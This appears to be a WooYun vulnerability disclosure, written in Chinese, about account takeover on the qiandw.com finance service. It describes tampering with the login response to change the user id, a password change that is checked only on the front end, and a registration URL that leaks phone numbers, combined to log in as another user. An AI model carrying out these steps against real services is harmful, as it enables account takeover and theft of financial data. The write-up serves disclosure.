WooYun.org

真是个奇葩设计，首先在登录处用正确账号登录来看看Response

{"result":"1","user":{"id":"48469","username":"wooyun","email":"","realname":"","idcard":"","mobile":"*******","createtime":"2015-06-11 04:32:19","pushState":{"is_financial":false,"is_experience":false}}}

说好的token、cookie呢？
只有个SERVERID不知道干嘛的
然后接下来配合https://www.qiandw.com/Account/Register?pid=***会直接显示用户手机号码的漏洞来打一套组合拳
我们假设存在用户id为20088（其实就有，看id排序可以看出来）
然后我们再次进行登录，用正确账号登录，抓包把Response改成：

{"result":"1","user":{"id":"20088","username":"wooyun","email":"","realname":"","idcard":"","mobile":"*******","createtime":"2015-06-11 04:32:19","pushState":{"is_financial":false,"is_experience":false}}}

客户端提示：登陆成功，此时虽然还是显示user：wooyun登录，但是已经在读取id为20088的用户的信息了，余额、交易记录等

进入客户端-我的财富-安全中心-修改登陆密码

需要输入当前密码，这是另一个大坑了，居然在前端校验输入的密码是否当前登录用户的密码
burp告诉我，这一步完全没有和后端做任何数据交流啊啊啊啊啊？？？？
此时输入正确用户的密码（用户名wooyun密码gggggg）
然后新密码输入（我设置为wooyun666）
服务端返回：

{"result":"1"}

设置成功了

此时用到https://www.qiandw.com/Account/Register?pid=20088
显示了手机号

用手机号码+密码wooyun666登录

呵。呵。呵呵呵。。。